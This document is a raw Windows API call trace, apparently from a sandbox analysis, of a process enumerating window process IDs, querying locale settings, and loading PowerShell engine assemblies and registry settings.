	[0719.902] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x494
	[0719.902] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1ec
	[0719.902] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x440
	[0719.903] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x7e8
	[0719.903] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x730
	[0719.903] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x2c8
	[0719.903] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x31c
	[0719.903] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x330
	[0719.903] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x128
	[0719.903] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x5c8
	[0719.903] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x6f8
	[0719.903] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x358
	[0719.903] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x73c
	[0719.904] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xb0
	[0719.904] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x250
	[0719.904] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x240
	[0719.904] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x790
	[0719.904] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x61c
	[0719.904] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x540
	[0719.904] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x538
	[0719.904] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x568
	[0719.904] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x538
	[0719.905] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x568
	[0719.905] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x538
	[0719.905] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x540
	[0719.905] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x540
	[0719.905] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x57c
	[0719.905] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x460
	[0719.905] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x554
	[0719.905] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.905] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x528
	[0719.905] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.906] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.906] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.906] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x79c
	[0719.906] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.906] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4e0
	[0719.906] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.906] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x460
	[0719.911] WerSetFlags () returned 0x0
	[0721.448] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0721.448] CoTaskMemFree (pv=0x0) 
	[0721.449] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12e148, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12e140 | out: pulNumLanguages=0x12e148, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12e140) returned 1
	[0721.449] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12e148, pwszLanguagesBuffer=0x2d533a0, pcchLanguagesBuffer=0x12e140 | out: pulNumLanguages=0x12e148, pwszLanguagesBuffer=0x2d533a0, pcchLanguagesBuffer=0x12e140) returned 1
	[0721.454] CoTaskMemAlloc (cb=0x24) returned 0x2f3720
	[0721.454] GetUserDefaultLocaleName (in: lpLocaleName=0x2f3720, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0721.455] CoTaskMemFree (pv=0x2f3720) 
	[0721.480] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0721.480] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0721.480] CoTaskMemFree (pv=0x2a6660) 
	[0721.482] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0721.482] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0721.482] CoTaskMemFree (pv=0x2a6660) 
	[0721.484] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0721.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0721.484] CoTaskMemFree (pv=0x2a6660) 
	[0722.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0722.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0722.910] SetErrorMode (uMode=0x1) returned 0x1
	[0722.911] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12ddc0 | out: lpFileInformation=0x12ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0722.911] SetErrorMode (uMode=0x1) returned 0x1
	[0722.911] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12e030 | out: lpdwHandle=0x12e030) returned 0x94c
	[0722.912] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d56c30 | out: lpData=0x2d56c30) returned 1
	[0722.913] VerQueryValueW (in: pBlock=0x2d56c30, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12dfa8, puLen=0x12dfa0 | out: lplpBuffer=0x12dfa8*=0x2d56ccc, puLen=0x12dfa0) returned 1
	[0722.913] VerQueryValueW (in: pBlock=0x2d56c30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x2d56da8, puLen=0x12df10) returned 1
	[0722.913] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0722.913] CoTaskMemAlloc (cb=0x2e) returned 0x2feaf0
	[0722.913] lstrcpyW (in: lpString1=0x2feaf0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0722.914] CoTaskMemFree (pv=0x2feaf0) 
	[0722.914] VerQueryValueW (in: pBlock=0x2d56c30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x2d56dfc, puLen=0x12df10) returned 1
	[0722.914] lstrlenW (lpString="System.Management.Automation") returned 28
	[0722.914] CoTaskMemAlloc (cb=0x3c) returned 0x2fcef0
	[0722.914] lstrcpyW (in: lpString1=0x2fcef0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0722.914] CoTaskMemFree (pv=0x2fcef0) 
	[0722.914] VerQueryValueW (in: pBlock=0x2d56c30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x2d56e58, puLen=0x12df10) returned 1
	[0722.914] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0722.914] CoTaskMemAlloc (cb=0x20) returned 0x2fa5b0
	[0722.914] lstrcpyW (in: lpString1=0x2fa5b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0722.914] CoTaskMemFree (pv=0x2fa5b0) 
	[0722.914] VerQueryValueW (in: pBlock=0x2d56c30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x2d56e98, puLen=0x12df10) returned 1
	[0722.914] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0722.914] CoTaskMemAlloc (cb=0x44) returned 0x2fcef0
	[0722.914] lstrcpyW (in: lpString1=0x2fcef0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0722.914] CoTaskMemFree (pv=0x2fcef0) 
	[0722.914] VerQueryValueW (in: pBlock=0x2d56c30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x2d56f00, puLen=0x12df10) returned 1
	[0722.914] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0722.915] CoTaskMemAlloc (cb=0x76) returned 0x281460
	[0722.915] lstrcpyW (in: lpString1=0x281460, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0722.915] CoTaskMemFree (pv=0x281460) 
	[0722.915] VerQueryValueW (in: pBlock=0x2d56c30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x2d56f9c, puLen=0x12df10) returned 1
	[0722.915] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0722.915] CoTaskMemAlloc (cb=0x44) returned 0x2fcef0
	[0722.915] lstrcpyW (in: lpString1=0x2fcef0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0722.915] CoTaskMemFree (pv=0x2fcef0) 
	[0722.915] VerQueryValueW (in: pBlock=0x2d56c30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x2d57000, puLen=0x12df10) returned 1
	[0722.915] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0722.915] CoTaskMemAlloc (cb=0x58) returned 0x2a1df0
	[0722.915] lstrcpyW (in: lpString1=0x2a1df0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0722.915] CoTaskMemFree (pv=0x2a1df0) 
	[0722.915] VerQueryValueW (in: pBlock=0x2d56c30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x2d5707c, puLen=0x12df10) returned 1
	[0722.915] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0722.915] CoTaskMemAlloc (cb=0x20) returned 0x2fa5b0
	[0722.916] lstrcpyW (in: lpString1=0x2fa5b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0722.916] CoTaskMemFree (pv=0x2fa5b0) 
	[0722.916] VerQueryValueW (in: pBlock=0x2d56c30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x2d56d24, puLen=0x12df10) returned 1
	[0722.916] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0722.916] CoTaskMemAlloc (cb=0x66) returned 0x2f9720
	[0722.916] lstrcpyW (in: lpString1=0x2f9720, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0722.916] CoTaskMemFree (pv=0x2f9720) 
	[0722.916] VerQueryValueW (in: pBlock=0x2d56c30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x0, puLen=0x12df10) returned 0
	[0722.916] VerQueryValueW (in: pBlock=0x2d56c30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x0, puLen=0x12df10) returned 0
	[0722.916] VerQueryValueW (in: pBlock=0x2d56c30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x0, puLen=0x12df10) returned 0
	[0722.916] VerQueryValueW (in: pBlock=0x2d56c30, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12dee8, puLen=0x12dee0 | out: lplpBuffer=0x12dee8*=0x2d56ccc, puLen=0x12dee0) returned 1
	[0722.916] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0722.916] VerLanguageNameW (in: wLang=0x0, szLang=0x283d90, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0722.916] CoTaskMemFree (pv=0x283d90) 
	[0722.916] VerQueryValueW (in: pBlock=0x2d56c30, lpSubBlock="\\", lplpBuffer=0x12df38, puLen=0x12df30 | out: lplpBuffer=0x12df38*=0x2d56c58, puLen=0x12df30) returned 1
	[0723.080] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0723.080] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.080] CoTaskMemFree (pv=0x2a6660) 
	[0723.084] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0723.084] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.084] CoTaskMemFree (pv=0x2a6660) 
	[0723.091] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12de08 | out: phkResult=0x12de08*=0x2f4) returned 0x0
	[0723.092] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x12ddf8 | out: phkResult=0x12ddf8*=0x2f8) returned 0x0
	[0723.092] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12de88 | out: phkResult=0x12de88*=0x2fc) returned 0x0
	[0724.531] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12ddcc, lpData=0x0, lpcbData=0x12ddc8*=0x0 | out: lpType=0x12ddcc*=0x1, lpData=0x0, lpcbData=0x12ddc8*=0x56) returned 0x0
	[0724.532] CoTaskMemAlloc (cb=0x5a) returned 0x2f96b0
	[0724.532] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dd9c, lpData=0x2f96b0, lpcbData=0x12dd98*=0x56 | out: lpType=0x12dd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12dd98*=0x56) returned 0x0
	[0724.532] CoTaskMemFree (pv=0x2f96b0) 
	[0724.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0724.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0724.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0726.161] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0726.161] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.161] CoTaskMemFree (pv=0x2a6660) 
	[0733.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0733.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0737.553] CoTaskMemAlloc (cb=0x104) returned 0x2a6770
	[0737.553] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6770, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0737.553] CoTaskMemFree (pv=0x2a6770) 
	[0737.555] CoTaskMemAlloc (cb=0x104) returned 0x2a6770
	[0737.555] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6770, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0737.555] CoTaskMemFree (pv=0x2a6770) 
	[0738.876] CoTaskMemAlloc (cb=0x104) returned 0x2a6770
	[0738.876] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6770, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0738.876] CoTaskMemFree (pv=0x2a6770) 
	[0738.878] CoTaskMemAlloc (cb=0x104) returned 0x2a6770
	[0738.878] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6770, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0738.878] CoTaskMemFree (pv=0x2a6770) 
	[0738.878] CoTaskMemAlloc (cb=0x104) returned 0x2a6770
	[0738.878] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6770, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0738.878] CoTaskMemFree (pv=0x2a6770) 
	[0741.895] CoTaskMemAlloc (cb=0x104) returned 0x2a6770
	[0741.895] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6770, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0741.895] CoTaskMemFree (pv=0x2a6770) 
	[0743.367] CoTaskMemAlloc (cb=0x104) returned 0x2a6770
	[0743.367] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6770, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0743.367] CoTaskMemFree (pv=0x2a6770) 
	[0744.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0744.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0751.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0751.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0752.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0752.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0757.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0757.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0762.272] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0762.272] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.272] CoTaskMemFree (pv=0x2a6990) 
	[0762.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12dbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0762.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
